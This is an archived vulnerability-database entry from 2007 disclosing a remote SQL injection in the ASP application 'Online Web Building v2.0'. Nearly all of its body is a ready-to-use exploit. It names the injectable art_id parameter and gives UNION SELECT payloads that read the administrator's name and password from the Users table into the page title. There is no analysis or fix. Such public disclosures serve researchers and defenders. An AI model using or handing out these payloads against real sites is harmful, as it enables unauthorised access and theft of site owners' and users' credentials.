Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16156
HistoryFeb 23, 2007 - 12:00 a.m.

Online Web Building v2.0 (id) Remote SQL Injection

2007-02-2300:00:00
vulners.com
23

Online Web Building v2.0 (id) Remote SQL Injection


Bulan: xoron


Download: http://www.aspindir.com/Goster/3439


Exploit: http://www.target.com/ page.asp?art_id=[SQL]

Username: page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1

Pass: page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,9+from+Users+where+id=1


Page title is username + password